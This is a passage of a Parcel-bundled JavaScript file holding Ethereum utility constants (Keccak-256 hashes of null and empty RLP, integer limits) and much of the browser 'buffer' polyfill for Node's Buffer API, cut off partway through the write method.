function $parcel$export(e, n, v, s) {
  Object.defineProperty(e, n, {get: v, set: s, enumerable: true, configurable: true});
}
var $parcel$global =
typeof globalThis !== 'undefined'
  ? globalThis
  : typeof self !== 'undefined'
  ? self
  : typeof window !== 'undefined'
  ? window
  : typeof global !== 'undefined'
  ? global
  : {};
function $parcel$interopDefault(a) {
  return a && a.__esModule ? a.default : a;
}
function $parcel$exportWildcard(dest, source) {
  Object.keys(source).forEach(function(key) {
    if (key === 'default' || key === '__esModule' || dest.hasOwnProperty(key)) {
      return;
    }

    Object.defineProperty(dest, key, {
      enumerable: true,
      get: function get() {
        return source[key];
      }
    });
  });

  return dest;
}
var $parcel$modules = {};
var $parcel$inits = {};

var parcelRequire = $parcel$global["parcelRequire4468"];
if (parcelRequire == null) {
  parcelRequire = function(id) {
    if (id in $parcel$modules) {
      return $parcel$modules[id].exports;
    }
    if (id in $parcel$inits) {
      var init = $parcel$inits[id];
      delete $parcel$inits[id];
      var module = {id: id, exports: {}};
      $parcel$modules[id] = module;
      init.call(module.exports, module, module.exports);
      return module.exports;
    }
    var err = new Error("Cannot find module '" + id + "'");
    err.code = 'MODULE_NOT_FOUND';
    throw err;
  };

  parcelRequire.register = function register(id, init) {
    $parcel$inits[id] = init;
  };

  $parcel$global["parcelRequire4468"] = parcelRequire;
}
parcelRequire.register("5jI7y", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.KECCAK256_RLP = module.exports.KECCAK256_RLP_S = module.exports.KECCAK256_RLP_ARRAY = module.exports.KECCAK256_RLP_ARRAY_S = module.exports.KECCAK256_NULL = module.exports.KECCAK256_NULL_S = module.exports.TWO_POW256 = module.exports.MAX_INTEGER = module.exports.MAX_UINT64 = void 0;

var $6ZWSX = parcelRequire("6ZWSX");

var $4jhio = parcelRequire("4jhio");
/**
 * 2^64-1
 */ module.exports.MAX_UINT64 = new $4jhio.BN("ffffffffffffffff", 16);
/**
 * The max integer that the evm can handle (2^256-1)
 */ module.exports.MAX_INTEGER = new $4jhio.BN("ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", 16);
/**
 * 2^256
 */ module.exports.TWO_POW256 = new $4jhio.BN("10000000000000000000000000000000000000000000000000000000000000000", 16);
/**
 * Keccak-256 hash of null
 */ module.exports.KECCAK256_NULL_S = "c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470";
/**
 * Keccak-256 hash of null
 */ module.exports.KECCAK256_NULL = $6ZWSX.Buffer.from(module.exports.KECCAK256_NULL_S, "hex");
/**
 * Keccak-256 of an RLP of an empty array
 */ module.exports.KECCAK256_RLP_ARRAY_S = "1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347";
/**
 * Keccak-256 of an RLP of an empty array
 */ module.exports.KECCAK256_RLP_ARRAY = $6ZWSX.Buffer.from(module.exports.KECCAK256_RLP_ARRAY_S, "hex");
/**
 * Keccak-256 hash of the RLP of null
 */ module.exports.KECCAK256_RLP_S = "56e81f171bcc55a6ff8345e692c0f86e5b48e01b996cadc001622fb5e363b421";
/**
 * Keccak-256 hash of the RLP of null
 */ module.exports.KECCAK256_RLP = $6ZWSX.Buffer.from(module.exports.KECCAK256_RLP_S, "hex");

});
parcelRequire.register("6ZWSX", function(module, exports) {

$parcel$export(module.exports, "Buffer", () => $51861dfc7ca9d588$export$a143d493d941bafc, (v) => $51861dfc7ca9d588$export$a143d493d941bafc = v);
$parcel$export(module.exports, "SlowBuffer", () => $51861dfc7ca9d588$export$e4cf37d7f6fb9e0a, (v) => $51861dfc7ca9d588$export$e4cf37d7f6fb9e0a = v);
$parcel$export(module.exports, "INSPECT_MAX_BYTES", () => $51861dfc7ca9d588$export$f99ded8fe4b79145, (v) => $51861dfc7ca9d588$export$f99ded8fe4b79145 = v);
$parcel$export(module.exports, "kMaxLength", () => $51861dfc7ca9d588$export$599f31c3813fae4d, (v) => $51861dfc7ca9d588$export$599f31c3813fae4d = v);
/*!
 * The buffer module from node.js, for the browser.
 *
 * @author   Feross Aboukhadijeh <https://feross.org>
 * @license  MIT
 */ /* eslint-disable no-proto */ var $51861dfc7ca9d588$export$a143d493d941bafc;
var $51861dfc7ca9d588$export$e4cf37d7f6fb9e0a;
var $51861dfc7ca9d588$export$f99ded8fe4b79145;
var $51861dfc7ca9d588$export$599f31c3813fae4d;
"use strict";

var $kuxul = parcelRequire("kuxul");

var $9NvM5 = parcelRequire("9NvM5");
const $51861dfc7ca9d588$var$customInspectSymbol = typeof Symbol === "function" && typeof Symbol["for"] === "function" // eslint-disable-line dot-notation
 ? Symbol["for"]("nodejs.util.inspect.custom") // eslint-disable-line dot-notation
 : null;
$51861dfc7ca9d588$export$a143d493d941bafc = $51861dfc7ca9d588$var$Buffer;
$51861dfc7ca9d588$export$e4cf37d7f6fb9e0a = $51861dfc7ca9d588$var$SlowBuffer;
$51861dfc7ca9d588$export$f99ded8fe4b79145 = 50;
const $51861dfc7ca9d588$var$K_MAX_LENGTH = 0x7fffffff;
$51861dfc7ca9d588$export$599f31c3813fae4d = $51861dfc7ca9d588$var$K_MAX_LENGTH;
/**
 * If `Buffer.TYPED_ARRAY_SUPPORT`:
 *   === true    Use Uint8Array implementation (fastest)
 *   === false   Print warning and recommend using `buffer` v4.x which has an Object
 *               implementation (most compatible, even IE6)
 *
 * Browsers that support typed arrays are IE 10+, Firefox 4+, Chrome 7+, Safari 5.1+,
 * Opera 11.6+, iOS 4.2+.
 *
 * We report that the browser does not support typed arrays if the are not subclassable
 * using __proto__. Firefox 4-29 lacks support for adding new properties to `Uint8Array`
 * (See: https://bugzilla.mozilla.org/show_bug.cgi?id=695438). IE 10 lacks support
 * for __proto__ and has a buggy typed array implementation.
 */ $51861dfc7ca9d588$var$Buffer.TYPED_ARRAY_SUPPORT = $51861dfc7ca9d588$var$typedArraySupport();
if (!$51861dfc7ca9d588$var$Buffer.TYPED_ARRAY_SUPPORT && typeof console !== "undefined" && typeof console.error === "function") console.error("This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support.");
function $51861dfc7ca9d588$var$typedArraySupport() {
    // Can typed array instances can be augmented?
    try {
        const arr = new Uint8Array(1);
        const proto = {
            foo: function() {
                return 42;
            }
        };
        Object.setPrototypeOf(proto, Uint8Array.prototype);
        Object.setPrototypeOf(arr, proto);
        return arr.foo() === 42;
    } catch (e) {
        return false;
    }
}
Object.defineProperty($51861dfc7ca9d588$var$Buffer.prototype, "parent", {
    enumerable: true,
    get: function() {
        if (!$51861dfc7ca9d588$var$Buffer.isBuffer(this)) return undefined;
        return this.buffer;
    }
});
Object.defineProperty($51861dfc7ca9d588$var$Buffer.prototype, "offset", {
    enumerable: true,
    get: function() {
        if (!$51861dfc7ca9d588$var$Buffer.isBuffer(this)) return undefined;
        return this.byteOffset;
    }
});
function $51861dfc7ca9d588$var$createBuffer(length) {
    if (length > $51861dfc7ca9d588$var$K_MAX_LENGTH) throw new RangeError('The value "' + length + '" is invalid for option "size"');
    // Return an augmented `Uint8Array` instance
    const buf = new Uint8Array(length);
    Object.setPrototypeOf(buf, $51861dfc7ca9d588$var$Buffer.prototype);
    return buf;
}
/**
 * The Buffer constructor returns instances of `Uint8Array` that have their
 * prototype changed to `Buffer.prototype`. Furthermore, `Buffer` is a subclass of
 * `Uint8Array`, so the returned instances will have all the node `Buffer` methods
 * and the `Uint8Array` methods. Square bracket notation works as expected -- it
 * returns a single octet.
 *
 * The `Uint8Array` prototype remains unmodified.
 */ function $51861dfc7ca9d588$var$Buffer(arg, encodingOrOffset, length) {
    // Common case.
    if (typeof arg === "number") {
        if (typeof encodingOrOffset === "string") throw new TypeError('The "string" argument must be of type string. Received type number');
        return $51861dfc7ca9d588$var$allocUnsafe(arg);
    }
    return $51861dfc7ca9d588$var$from(arg, encodingOrOffset, length);
}
$51861dfc7ca9d588$var$Buffer.poolSize = 8192 // not used by this implementation
;
function $51861dfc7ca9d588$var$from(value, encodingOrOffset, length) {
    if (typeof value === "string") return $51861dfc7ca9d588$var$fromString(value, encodingOrOffset);
    if (ArrayBuffer.isView(value)) return $51861dfc7ca9d588$var$fromArrayView(value);
    if (value == null) throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type " + typeof value);
    if ($51861dfc7ca9d588$var$isInstance(value, ArrayBuffer) || value && $51861dfc7ca9d588$var$isInstance(value.buffer, ArrayBuffer)) return $51861dfc7ca9d588$var$fromArrayBuffer(value, encodingOrOffset, length);
    if (typeof SharedArrayBuffer !== "undefined" && ($51861dfc7ca9d588$var$isInstance(value, SharedArrayBuffer) || value && $51861dfc7ca9d588$var$isInstance(value.buffer, SharedArrayBuffer))) return $51861dfc7ca9d588$var$fromArrayBuffer(value, encodingOrOffset, length);
    if (typeof value === "number") throw new TypeError('The "value" argument must not be of type number. Received type number');
    const valueOf = value.valueOf && value.valueOf();
    if (valueOf != null && valueOf !== value) return $51861dfc7ca9d588$var$Buffer.from(valueOf, encodingOrOffset, length);
    const b = $51861dfc7ca9d588$var$fromObject(value);
    if (b) return b;
    if (typeof Symbol !== "undefined" && Symbol.toPrimitive != null && typeof value[Symbol.toPrimitive] === "function") return $51861dfc7ca9d588$var$Buffer.from(value[Symbol.toPrimitive]("string"), encodingOrOffset, length);
    throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type " + typeof value);
}
/**
 * Functionally equivalent to Buffer(arg, encoding) but throws a TypeError
 * if value is a number.
 * Buffer.from(str[, encoding])
 * Buffer.from(array)
 * Buffer.from(buffer)
 * Buffer.from(arrayBuffer[, byteOffset[, length]])
 **/ $51861dfc7ca9d588$var$Buffer.from = function(value, encodingOrOffset, length) {
    return $51861dfc7ca9d588$var$from(value, encodingOrOffset, length);
};
// Note: Change prototype *after* Buffer.from is defined to workaround Chrome bug:
// https://github.com/feross/buffer/pull/148
Object.setPrototypeOf($51861dfc7ca9d588$var$Buffer.prototype, Uint8Array.prototype);
Object.setPrototypeOf($51861dfc7ca9d588$var$Buffer, Uint8Array);
function $51861dfc7ca9d588$var$assertSize(size) {
    if (typeof size !== "number") throw new TypeError('"size" argument must be of type number');
    else if (size < 0) throw new RangeError('The value "' + size + '" is invalid for option "size"');
}
function $51861dfc7ca9d588$var$alloc(size, fill, encoding) {
    $51861dfc7ca9d588$var$assertSize(size);
    if (size <= 0) return $51861dfc7ca9d588$var$createBuffer(size);
    if (fill !== undefined) // Only pay attention to encoding if it's a string. This
    // prevents accidentally sending in a number that would
    // be interpreted as a start offset.
    return typeof encoding === "string" ? $51861dfc7ca9d588$var$createBuffer(size).fill(fill, encoding) : $51861dfc7ca9d588$var$createBuffer(size).fill(fill);
    return $51861dfc7ca9d588$var$createBuffer(size);
}
/**
 * Creates a new filled Buffer instance.
 * alloc(size[, fill[, encoding]])
 **/ $51861dfc7ca9d588$var$Buffer.alloc = function(size, fill, encoding) {
    return $51861dfc7ca9d588$var$alloc(size, fill, encoding);
};
function $51861dfc7ca9d588$var$allocUnsafe(size) {
    $51861dfc7ca9d588$var$assertSize(size);
    return $51861dfc7ca9d588$var$createBuffer(size < 0 ? 0 : $51861dfc7ca9d588$var$checked(size) | 0);
}
/**
 * Equivalent to Buffer(num), by default creates a non-zero-filled Buffer instance.
 * */ $51861dfc7ca9d588$var$Buffer.allocUnsafe = function(size) {
    return $51861dfc7ca9d588$var$allocUnsafe(size);
};
/**
 * Equivalent to SlowBuffer(num), by default creates a non-zero-filled Buffer instance.
 */ $51861dfc7ca9d588$var$Buffer.allocUnsafeSlow = function(size) {
    return $51861dfc7ca9d588$var$allocUnsafe(size);
};
function $51861dfc7ca9d588$var$fromString(string, encoding) {
    if (typeof encoding !== "string" || encoding === "") encoding = "utf8";
    if (!$51861dfc7ca9d588$var$Buffer.isEncoding(encoding)) throw new TypeError("Unknown encoding: " + encoding);
    const length = $51861dfc7ca9d588$var$byteLength(string, encoding) | 0;
    let buf = $51861dfc7ca9d588$var$createBuffer(length);
    const actual = buf.write(string, encoding);
    if (actual !== length) // Writing a hex string, for example, that contains invalid characters will
    // cause everything after the first invalid character to be ignored. (e.g.
    // 'abxxcd' will be treated as 'ab')
    buf = buf.slice(0, actual);
    return buf;
}
function $51861dfc7ca9d588$var$fromArrayLike(array) {
    const length = array.length < 0 ? 0 : $51861dfc7ca9d588$var$checked(array.length) | 0;
    const buf = $51861dfc7ca9d588$var$createBuffer(length);
    for(let i = 0; i < length; i += 1)buf[i] = array[i] & 255;
    return buf;
}
function $51861dfc7ca9d588$var$fromArrayView(arrayView) {
    if ($51861dfc7ca9d588$var$isInstance(arrayView, Uint8Array)) {
        const copy = new Uint8Array(arrayView);
        return $51861dfc7ca9d588$var$fromArrayBuffer(copy.buffer, copy.byteOffset, copy.byteLength);
    }
    return $51861dfc7ca9d588$var$fromArrayLike(arrayView);
}
function $51861dfc7ca9d588$var$fromArrayBuffer(array, byteOffset, length) {
    if (byteOffset < 0 || array.byteLength < byteOffset) throw new RangeError('"offset" is outside of buffer bounds');
    if (array.byteLength < byteOffset + (length || 0)) throw new RangeError('"length" is outside of buffer bounds');
    let buf;
    if (byteOffset === undefined && length === undefined) buf = new Uint8Array(array);
    else if (length === undefined) buf = new Uint8Array(array, byteOffset);
    else buf = new Uint8Array(array, byteOffset, length);
    // Return an augmented `Uint8Array` instance
    Object.setPrototypeOf(buf, $51861dfc7ca9d588$var$Buffer.prototype);
    return buf;
}
function $51861dfc7ca9d588$var$fromObject(obj) {
    if ($51861dfc7ca9d588$var$Buffer.isBuffer(obj)) {
        const len = $51861dfc7ca9d588$var$checked(obj.length) | 0;
        const buf = $51861dfc7ca9d588$var$createBuffer(len);
        if (buf.length === 0) return buf;
        obj.copy(buf, 0, 0, len);
        return buf;
    }
    if (obj.length !== undefined) {
        if (typeof obj.length !== "number" || $51861dfc7ca9d588$var$numberIsNaN(obj.length)) return $51861dfc7ca9d588$var$createBuffer(0);
        return $51861dfc7ca9d588$var$fromArrayLike(obj);
    }
    if (obj.type === "Buffer" && Array.isArray(obj.data)) return $51861dfc7ca9d588$var$fromArrayLike(obj.data);
}
function $51861dfc7ca9d588$var$checked(length) {
    // Note: cannot use `length < K_MAX_LENGTH` here because that fails when
    // length is NaN (which is otherwise coerced to zero.)
    if (length >= $51861dfc7ca9d588$var$K_MAX_LENGTH) throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x" + $51861dfc7ca9d588$var$K_MAX_LENGTH.toString(16) + " bytes");
    return length | 0;
}
function $51861dfc7ca9d588$var$SlowBuffer(length) {
    if (+length != length) length = 0;
    return $51861dfc7ca9d588$var$Buffer.alloc(+length);
}
$51861dfc7ca9d588$var$Buffer.isBuffer = function isBuffer(b) {
    return b != null && b._isBuffer === true && b !== $51861dfc7ca9d588$var$Buffer.prototype // so Buffer.isBuffer(Buffer.prototype) will be false
    ;
};
$51861dfc7ca9d588$var$Buffer.compare = function compare(a, b) {
    if ($51861dfc7ca9d588$var$isInstance(a, Uint8Array)) a = $51861dfc7ca9d588$var$Buffer.from(a, a.offset, a.byteLength);
    if ($51861dfc7ca9d588$var$isInstance(b, Uint8Array)) b = $51861dfc7ca9d588$var$Buffer.from(b, b.offset, b.byteLength);
    if (!$51861dfc7ca9d588$var$Buffer.isBuffer(a) || !$51861dfc7ca9d588$var$Buffer.isBuffer(b)) throw new TypeError('The "buf1", "buf2" arguments must be one of type Buffer or Uint8Array');
    if (a === b) return 0;
    let x = a.length;
    let y = b.length;
    for(let i = 0, len = Math.min(x, y); i < len; ++i)if (a[i] !== b[i]) {
        x = a[i];
        y = b[i];
        break;
    }
    if (x < y) return -1;
    if (y < x) return 1;
    return 0;
};
$51861dfc7ca9d588$var$Buffer.isEncoding = function isEncoding(encoding) {
    switch(String(encoding).toLowerCase()){
        case "hex":
        case "utf8":
        case "utf-8":
        case "ascii":
        case "latin1":
        case "binary":
        case "base64":
        case "ucs2":
        case "ucs-2":
        case "utf16le":
        case "utf-16le":
            return true;
        default:
            return false;
    }
};
$51861dfc7ca9d588$var$Buffer.concat = function concat(list, length) {
    if (!Array.isArray(list)) throw new TypeError('"list" argument must be an Array of Buffers');
    if (list.length === 0) return $51861dfc7ca9d588$var$Buffer.alloc(0);
    let i;
    if (length === undefined) {
        length = 0;
        for(i = 0; i < list.length; ++i)length += list[i].length;
    }
    const buffer = $51861dfc7ca9d588$var$Buffer.allocUnsafe(length);
    let pos = 0;
    for(i = 0; i < list.length; ++i){
        let buf = list[i];
        if ($51861dfc7ca9d588$var$isInstance(buf, Uint8Array)) {
            if (pos + buf.length > buffer.length) {
                if (!$51861dfc7ca9d588$var$Buffer.isBuffer(buf)) buf = $51861dfc7ca9d588$var$Buffer.from(buf);
                buf.copy(buffer, pos);
            } else Uint8Array.prototype.set.call(buffer, buf, pos);
        } else if (!$51861dfc7ca9d588$var$Buffer.isBuffer(buf)) throw new TypeError('"list" argument must be an Array of Buffers');
        else buf.copy(buffer, pos);
        pos += buf.length;
    }
    return buffer;
};
function $51861dfc7ca9d588$var$byteLength(string, encoding) {
    if ($51861dfc7ca9d588$var$Buffer.isBuffer(string)) return string.length;
    if (ArrayBuffer.isView(string) || $51861dfc7ca9d588$var$isInstance(string, ArrayBuffer)) return string.byteLength;
    if (typeof string !== "string") throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type ' + typeof string);
    const len = string.length;
    const mustMatch = arguments.length > 2 && arguments[2] === true;
    if (!mustMatch && len === 0) return 0;
    // Use a for loop to avoid recursion
    let loweredCase = false;
    for(;;)switch(encoding){
        case "ascii":
        case "latin1":
        case "binary":
            return len;
        case "utf8":
        case "utf-8":
            return $51861dfc7ca9d588$var$utf8ToBytes(string).length;
        case "ucs2":
        case "ucs-2":
        case "utf16le":
        case "utf-16le":
            return len * 2;
        case "hex":
            return len >>> 1;
        case "base64":
            return $51861dfc7ca9d588$var$base64ToBytes(string).length;
        default:
            if (loweredCase) return mustMatch ? -1 : $51861dfc7ca9d588$var$utf8ToBytes(string).length // assume utf8
            ;
            encoding = ("" + encoding).toLowerCase();
            loweredCase = true;
    }
}
$51861dfc7ca9d588$var$Buffer.byteLength = $51861dfc7ca9d588$var$byteLength;
function $51861dfc7ca9d588$var$slowToString(encoding, start, end) {
    let loweredCase = false;
    // No need to verify that "this.length <= MAX_UINT32" since it's a read-only
    // property of a typed array.
    // This behaves neither like String nor Uint8Array in that we set start/end
    // to their upper/lower bounds if the value passed is out of range.
    // undefined is handled specially as per ECMA-262 6th Edition,
    // Section 13.3.3.7 Runtime Semantics: KeyedBindingInitialization.
    if (start === undefined || start < 0) start = 0;
    // Return early if start > this.length. Done here to prevent potential uint32
    // coercion fail below.
    if (start > this.length) return "";
    if (end === undefined || end > this.length) end = this.length;
    if (end <= 0) return "";
    // Force coercion to uint32. This will also coerce falsey/NaN values to 0.
    end >>>= 0;
    start >>>= 0;
    if (end <= start) return "";
    if (!encoding) encoding = "utf8";
    while(true)switch(encoding){
        case "hex":
            return $51861dfc7ca9d588$var$hexSlice(this, start, end);
        case "utf8":
        case "utf-8":
            return $51861dfc7ca9d588$var$utf8Slice(this, start, end);
        case "ascii":
            return $51861dfc7ca9d588$var$asciiSlice(this, start, end);
        case "latin1":
        case "binary":
            return $51861dfc7ca9d588$var$latin1Slice(this, start, end);
        case "base64":
            return $51861dfc7ca9d588$var$base64Slice(this, start, end);
        case "ucs2":
        case "ucs-2":
        case "utf16le":
        case "utf-16le":
            return $51861dfc7ca9d588$var$utf16leSlice(this, start, end);
        default:
            if (loweredCase) throw new TypeError("Unknown encoding: " + encoding);
            encoding = (encoding + "").toLowerCase();
            loweredCase = true;
    }
}
// This property is used by `Buffer.isBuffer` (and the `is-buffer` npm package)
// to detect a Buffer instance. It's not possible to use `instanceof Buffer`
// reliably in a browserify context because there could be multiple different
// copies of the 'buffer' package in use. This method works even for Buffer
// instances that were created from another copy of the `buffer` package.
// See: https://github.com/feross/buffer/issues/154
$51861dfc7ca9d588$var$Buffer.prototype._isBuffer = true;
function $51861dfc7ca9d588$var$swap(b, n, m) {
    const i = b[n];
    b[n] = b[m];
    b[m] = i;
}
$51861dfc7ca9d588$var$Buffer.prototype.swap16 = function swap16() {
    const len = this.length;
    if (len % 2 !== 0) throw new RangeError("Buffer size must be a multiple of 16-bits");
    for(let i = 0; i < len; i += 2)$51861dfc7ca9d588$var$swap(this, i, i + 1);
    return this;
};
$51861dfc7ca9d588$var$Buffer.prototype.swap32 = function swap32() {
    const len = this.length;
    if (len % 4 !== 0) throw new RangeError("Buffer size must be a multiple of 32-bits");
    for(let i = 0; i < len; i += 4){
        $51861dfc7ca9d588$var$swap(this, i, i + 3);
        $51861dfc7ca9d588$var$swap(this, i + 1, i + 2);
    }
    return this;
};
$51861dfc7ca9d588$var$Buffer.prototype.swap64 = function swap64() {
    const len = this.length;
    if (len % 8 !== 0) throw new RangeError("Buffer size must be a multiple of 64-bits");
    for(let i = 0; i < len; i += 8){
        $51861dfc7ca9d588$var$swap(this, i, i + 7);
        $51861dfc7ca9d588$var$swap(this, i + 1, i + 6);
        $51861dfc7ca9d588$var$swap(this, i + 2, i + 5);
        $51861dfc7ca9d588$var$swap(this, i + 3, i + 4);
    }
    return this;
};
$51861dfc7ca9d588$var$Buffer.prototype.toString = function toString() {
    const length = this.length;
    if (length === 0) return "";
    if (arguments.length === 0) return $51861dfc7ca9d588$var$utf8Slice(this, 0, length);
    return $51861dfc7ca9d588$var$slowToString.apply(this, arguments);
};
$51861dfc7ca9d588$var$Buffer.prototype.toLocaleString = $51861dfc7ca9d588$var$Buffer.prototype.toString;
$51861dfc7ca9d588$var$Buffer.prototype.equals = function equals(b) {
    if (!$51861dfc7ca9d588$var$Buffer.isBuffer(b)) throw new TypeError("Argument must be a Buffer");
    if (this === b) return true;
    return $51861dfc7ca9d588$var$Buffer.compare(this, b) === 0;
};
$51861dfc7ca9d588$var$Buffer.prototype.inspect = function inspect() {
    let str = "";
    const max = $51861dfc7ca9d588$export$f99ded8fe4b79145;
    str = this.toString("hex", 0, max).replace(/(.{2})/g, "$1 ").trim();
    if (this.length > max) str += " ... ";
    return "<Buffer " + str + ">";
};
if ($51861dfc7ca9d588$var$customInspectSymbol) $51861dfc7ca9d588$var$Buffer.prototype[$51861dfc7ca9d588$var$customInspectSymbol] = $51861dfc7ca9d588$var$Buffer.prototype.inspect;
$51861dfc7ca9d588$var$Buffer.prototype.compare = function compare(target, start, end, thisStart, thisEnd) {
    if ($51861dfc7ca9d588$var$isInstance(target, Uint8Array)) target = $51861dfc7ca9d588$var$Buffer.from(target, target.offset, target.byteLength);
    if (!$51861dfc7ca9d588$var$Buffer.isBuffer(target)) throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type ' + typeof target);
    if (start === undefined) start = 0;
    if (end === undefined) end = target ? target.length : 0;
    if (thisStart === undefined) thisStart = 0;
    if (thisEnd === undefined) thisEnd = this.length;
    if (start < 0 || end > target.length || thisStart < 0 || thisEnd > this.length) throw new RangeError("out of range index");
    if (thisStart >= thisEnd && start >= end) return 0;
    if (thisStart >= thisEnd) return -1;
    if (start >= end) return 1;
    start >>>= 0;
    end >>>= 0;
    thisStart >>>= 0;
    thisEnd >>>= 0;
    if (this === target) return 0;
    let x = thisEnd - thisStart;
    let y = end - start;
    const len = Math.min(x, y);
    const thisCopy = this.slice(thisStart, thisEnd);
    const targetCopy = target.slice(start, end);
    for(let i = 0; i < len; ++i)if (thisCopy[i] !== targetCopy[i]) {
        x = thisCopy[i];
        y = targetCopy[i];
        break;
    }
    if (x < y) return -1;
    if (y < x) return 1;
    return 0;
};
// Finds either the first index of `val` in `buffer` at offset >= `byteOffset`,
// OR the last index of `val` in `buffer` at offset <= `byteOffset`.
//
// Arguments:
// - buffer - a Buffer to search
// - val - a string, Buffer, or number
// - byteOffset - an index into `buffer`; will be clamped to an int32
// - encoding - an optional encoding, relevant is val is a string
// - dir - true for indexOf, false for lastIndexOf
function $51861dfc7ca9d588$var$bidirectionalIndexOf(buffer, val, byteOffset, encoding, dir) {
    // Empty buffer means no match
    if (buffer.length === 0) return -1;
    // Normalize byteOffset
    if (typeof byteOffset === "string") {
        encoding = byteOffset;
        byteOffset = 0;
    } else if (byteOffset > 0x7fffffff) byteOffset = 0x7fffffff;
    else if (byteOffset < -2147483648) byteOffset = -2147483648;
    byteOffset = +byteOffset // Coerce to Number.
    ;
    if ($51861dfc7ca9d588$var$numberIsNaN(byteOffset)) // byteOffset: it it's undefined, null, NaN, "foo", etc, search whole buffer
    byteOffset = dir ? 0 : buffer.length - 1;
    // Normalize byteOffset: negative offsets start from the end of the buffer
    if (byteOffset < 0) byteOffset = buffer.length + byteOffset;
    if (byteOffset >= buffer.length) {
        if (dir) return -1;
        else byteOffset = buffer.length - 1;
    } else if (byteOffset < 0) {
        if (dir) byteOffset = 0;
        else return -1;
    }
    // Normalize val
    if (typeof val === "string") val = $51861dfc7ca9d588$var$Buffer.from(val, encoding);
    // Finally, search either indexOf (if dir is true) or lastIndexOf
    if ($51861dfc7ca9d588$var$Buffer.isBuffer(val)) {
        // Special case: looking for empty string/buffer always fails
        if (val.length === 0) return -1;
        return $51861dfc7ca9d588$var$arrayIndexOf(buffer, val, byteOffset, encoding, dir);
    } else if (typeof val === "number") {
        val = val & 0xFF // Search for a byte value [0-255]
        ;
        if (typeof Uint8Array.prototype.indexOf === "function") {
            if (dir) return Uint8Array.prototype.indexOf.call(buffer, val, byteOffset);
            else return Uint8Array.prototype.lastIndexOf.call(buffer, val, byteOffset);
        }
        return $51861dfc7ca9d588$var$arrayIndexOf(buffer, [
            val
        ], byteOffset, encoding, dir);
    }
    throw new TypeError("val must be string, number or Buffer");
}
function $51861dfc7ca9d588$var$arrayIndexOf(arr, val, byteOffset, encoding, dir) {
    let indexSize = 1;
    let arrLength = arr.length;
    let valLength = val.length;
    if (encoding !== undefined) {
        encoding = String(encoding).toLowerCase();
        if (encoding === "ucs2" || encoding === "ucs-2" || encoding === "utf16le" || encoding === "utf-16le") {
            if (arr.length < 2 || val.length < 2) return -1;
            indexSize = 2;
            arrLength /= 2;
            valLength /= 2;
            byteOffset /= 2;
        }
    }
    function read(buf, i) {
        if (indexSize === 1) return buf[i];
        else return buf.readUInt16BE(i * indexSize);
    }
    let i;
    if (dir) {
        let foundIndex = -1;
        for(i = byteOffset; i < arrLength; i++)if (read(arr, i) === read(val, foundIndex === -1 ? 0 : i - foundIndex)) {
            if (foundIndex === -1) foundIndex = i;
            if (i - foundIndex + 1 === valLength) return foundIndex * indexSize;
        } else {
            if (foundIndex !== -1) i -= i - foundIndex;
            foundIndex = -1;
        }
    } else {
        if (byteOffset + valLength > arrLength) byteOffset = arrLength - valLength;
        for(i = byteOffset; i >= 0; i--){
            let found = true;
            for(let j = 0; j < valLength; j++)if (read(arr, i + j) !== read(val, j)) {
                found = false;
                break;
            }
            if (found) return i;
        }
    }
    return -1;
}
$51861dfc7ca9d588$var$Buffer.prototype.includes = function includes(val, byteOffset, encoding) {
    return this.indexOf(val, byteOffset, encoding) !== -1;
};
$51861dfc7ca9d588$var$Buffer.prototype.indexOf = function indexOf(val, byteOffset, encoding) {
    return $51861dfc7ca9d588$var$bidirectionalIndexOf(this, val, byteOffset, encoding, true);
};
$51861dfc7ca9d588$var$Buffer.prototype.lastIndexOf = function lastIndexOf(val, byteOffset, encoding) {
    return $51861dfc7ca9d588$var$bidirectionalIndexOf(this, val, byteOffset, encoding, false);
};
function $51861dfc7ca9d588$var$hexWrite(buf, string, offset, length) {
    offset = Number(offset) || 0;
    const remaining = buf.length - offset;
    if (!length) length = remaining;
    else {
        length = Number(length);
        if (length > remaining) length = remaining;
    }
    const strLen = string.length;
    if (length > strLen / 2) length = strLen / 2;
    let i;
    for(i = 0; i < length; ++i){
        const parsed = parseInt(string.substr(i * 2, 2), 16);
        if ($51861dfc7ca9d588$var$numberIsNaN(parsed)) return i;
        buf[offset + i] = parsed;
    }
    return i;
}
function $51861dfc7ca9d588$var$utf8Write(buf, string, offset, length) {
    return $51861dfc7ca9d588$var$blitBuffer($51861dfc7ca9d588$var$utf8ToBytes(string, buf.length - offset), buf, offset, length);
}
function $51861dfc7ca9d588$var$asciiWrite(buf, string, offset, length) {
    return $51861dfc7ca9d588$var$blitBuffer($51861dfc7ca9d588$var$asciiToBytes(string), buf, offset, length);
}
function $51861dfc7ca9d588$var$base64Write(buf, string, offset, length) {
    return $51861dfc7ca9d588$var$blitBuffer($51861dfc7ca9d588$var$base64ToBytes(string), buf, offset, length);
}
function $51861dfc7ca9d588$var$ucs2Write(buf, string, offset, length) {
    return $51861dfc7ca9d588$var$blitBuffer($51861dfc7ca9d588$var$utf16leToBytes(string, buf.length - offset), buf, offset, length);
}
$51861dfc7ca9d588$var$Buffer.prototype.write = function write(string, offset, length, encoding) {
    // Buffer#write(string)
    if (offset === undefined) {
        encoding = "utf8";
        length = this.length;
        offset = 0;
    // Buffer#write(string, encoding)
    } else if (length === undefined && typeof offset === "string") {
        encoding = offset;
        length = this.length;
        offset = 0;
    // Buffer#write(string, offset[, length][, encoding])
    } else if (isFinite(offset)) {
        offset = offset >>> 0;
        if (isFinite(length)) {
            length = length >>> 0;
            if (encoding === undefined) encoding = "utf8";
        } else {
            encoding = length;
            length = undefined;
        }
    } else throw new Error("Buffer.write(string, encoding, offset[, length]) is no longer supported");
    const remaining = this.length - offset;
    if (length === undefined || length > remaining) length = remaining;
    if (string.length > 0 && (length < 0 || offset < 0) || offset > this.length) throw new RangeError("Attempt to write outside buffer bounds");
    if (!encoding) encoding = "utf8";
    let loweredCase = false;
    for(;;)switch(encoding){
        case "hex":
